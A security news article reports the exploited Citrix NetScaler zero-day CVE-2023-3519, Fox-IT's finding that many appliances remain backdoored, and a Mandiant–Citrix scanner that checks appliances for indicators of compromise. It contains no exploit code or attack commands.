Citrix was previously discovered with a Zero-Day vulnerability on their Citrix NetScaler Application Delivery Controller (ADC) that allowed threat actors to perform remote code execution.
The Zero-Day was found to be exploited in the wild and was given CVE-2023-3519 with a severity of 9.8 (Critical).
Citrix released patches for fixing the vulnerability, but there was no option to find whether a Citrix appliance had been affected.
According to a recent report by Fox-IT, which is a part of NCC Group, it has been found that over 1900 NetScalers are still infected with a backdoor.
However, after several analyses, researchers have released a GitHub tool that can scan Citrix appliances for evidence of post-exploitation activity relating to CVE-2023-3519.
This tool consists of multiple indicators of compromise found during the Zero-Day investigations.
Citrix IOC Scanner CVE-2023-3519
Mandiant released this tool as an effort to help organizations to identify appliances that threat actors already compromise.
Mandiant has recommended organizations use this tool for scanning all appliances that are vulnerable and are connected to the internet.
Furthermore, the tool has been designed to scan a live appliance or a mounted forensic image.
Citrix IOC scanner can be used to analyze log sources and system forensic artifacts for identifying any evidence that routes to CVE-2023-3519.
In case of any evidence is found, organizations are recommended to perform a forensic inspection of the risk system to gather details about the scope and extent of the security incident.
This tool consists of many features, which include scanning,
- File system path that could be a malware
- Shell history for suspicious commands
- NetScaler directories and files that match with IOCs
- Suspicious file permissions or ownership
- Crontab entries
- Malicious processes running on the system
This tool was developed in collaboration with Citrix and Mandiant, which solely aims at helping organizations to prevent and scan against compromised systems.
Moreover, Mandiant also mentioned the tool will not be 100% accurate since many files on the system may be truncated, rolled or the system could have been rebooted.
In certain cases, it is also possible for attackers to tamper with the evidence on the system or mask the compromise with rootkits.
Hence, it is recommended for organizations to scan the appliances completely even after performing the scan with the Citrix IOC scanner.